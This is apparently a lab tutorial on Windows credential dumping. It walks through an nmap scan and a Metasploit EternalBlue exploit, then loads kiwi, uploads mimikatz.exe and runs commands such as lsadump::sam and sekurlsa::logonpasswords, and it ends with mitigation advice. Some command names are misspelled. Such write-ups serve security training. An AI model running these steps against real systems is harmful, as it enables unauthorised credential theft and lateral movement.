Dumping Hashes with Mimikatz:
Mimikatz is a well-liked post-exploitation tool that hackers use to steal crucial authentication credentials stored in memory, particularly for Windows systems. Attackers can use this tool by Benjamin Delpy to retrieve plaintext passwords, hashes, and other credentials from memory to gain elevated access and move laterally within a network.
I uploaded a video on my YouTube channel demonstrating how to perform those steps.
How Mimikatz works:
- Pass-the-Ticket Attacks:
- Mimikatz can extract Kerberos tickets from memory. Kerberos is the default authentication protocol used in Windows environments. By stealing these tickets, an attacker can impersonate a user and gain unauthorised access.
- Pass-the-Hash Attacks:
- It can extract password hashes stored in memory. Instead of stealing plaintext passwords, Mimikatz can.
- Use these password hashes directly to authenticate and escalate privileges without needing the password.
2. Pass-the-Certificate Attacks:
- Mimikatz can also target authentication certificates stored in the Windows Credential Manager.
3. Golden Ticket Attacks:
- Mimikatz allows the creation of “Golden Tickets,” which are forged Kerberos tickets. These tickets can provide long-term and persistent access to a network.
4. Silver Ticket Attacks:
- Similar to golden tickets, silver tickets are forged tickets that allow an attacker to access specific services within a network.
5. Credential Dumping:
- Mimikatz has various modules that dump different credentials, including plaintext passwords, NTLM hashes, and Kerberos tickets.
It’s important to note that Mimikatz is a tool that has legitimate uses, such as by security professionals for testing and enhancing security. However, it has gained notoriety as a potential weapon in the hands of malicious actors due to its ability to exploit vulnerabilities in the Windows authentication system. Organizations use various security measures, like endpoint protection and detection systems, to defend against Mimikatz and similar tools.
- Performed nmap with the target ip and service version detection
Once we get the service version, it's time to run msfconsole.
Service postgresql start && msfconsole
Search bedblue
Type 1 ( default payload will be established)
Show options
We need to configure target ip
Set rhost “target IP.”
Exploit
After the meterpreter session has been established, we can try to get some information about the system.
Type sysinfo
- Getuid and also type Pgrep lsass and after that, Migrate 788
- Lets start with kiwi
- Load kiwi
- Open up the help menu
- Creds_all
- Lsa_dump_sam ( that is going to dump all the ntlm hashes for user accounts in the system)
- Dump lsa_dump_secret
Cd C:\\
lets create the temp folder and upload mimikatz.exe to that folder
Mkdir Temp
Cd Temp
Upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
open the Shell session. type shell
Dir
.\mimikatz.exe
Check privileges
Type privilege: debug.
privilege::debug
requests the debug privilege (SeDebugPrivilege
).It is required to debug and adjust the memory of a process owned by another account.User Right: Debug Programme
if we want to dump the content of Sam database,
lasdump::sam
lsadump::sam
dumps the local Security Account Manager (SAM) NT hashes (cf. SAM secrets dump). It can operate directly on the target system or offline with registry hives backups (for SAM
and SYSTEM
). It has the following command-line arguments:
Which will provide with much more information, such as syskey, Samkey, and NTLM hash
Lsadump::secrets
lsadump::secrets
can be used to dump LSA secrets from the registries. It retrieves the SysKey
to decrypt Secrets
entries.
Whenever the user logs in to the system, if the system is configured to store a password in memory in clear text, Mimikatz can show this password.
Sekurlsa::logonpasswords
Mitigation
Organisations should adopt a multi-layered security approach to mitigate the risks associated with Mimikatz and similar credential-dumping tools. To do this, robust endpoint protection solutions with up-to-date antivirus and anti-malware tools must be used, along with features like Credential Guard on Windows systems, the least privilege principle must be followed to limit access, and multi-factor authentication must be used. Regularly patching operating systems and software, implementing network segmentation, and establishing comprehensive monitoring and logging practises are essential. User education on phishing threats, strong password practises, and reporting suspicious activities is crucial. Additionally, disabling unnecessary services and protocols and having a well-defined incident response plan contribute to a holistic strategy for mitigating the risks posed by tools like Mimikatz.